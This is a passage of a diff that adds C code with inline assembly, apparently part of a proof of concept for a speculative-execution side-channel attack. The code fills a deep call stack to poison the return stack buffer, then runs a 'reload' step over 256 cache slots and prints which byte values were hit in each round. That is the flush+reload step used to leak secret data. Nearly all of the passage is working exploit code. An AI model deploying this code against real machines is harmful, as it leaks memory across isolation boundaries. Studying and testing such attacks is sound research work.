+        "add $(8 * " XSTR(RSB_DEPTH) "), %%rsp\n"
+#endif
+        // shift the fr_array ptr
+        "add $0x1000, %%rdi\n\t"
+        "ret\n\t"
+        "deep_callstack_done:"
+        :
+        : "r"(depth), "r"(fr_array), "r"(a), "r"(deep_callstack_done)
+        : "rdi", "memory", "rcx");
+
+    // Reload
+    int hits[256] = {};
+    inception_reload(hits);
+
+    printf("==== round %d =====\n", j);
+    for (int i = 0; i < 256; i++)
+      if (hits[i]) printf("hit for %d\n", i);
+
+    fflush(stdout);
+  }
+
+  return 0;
+}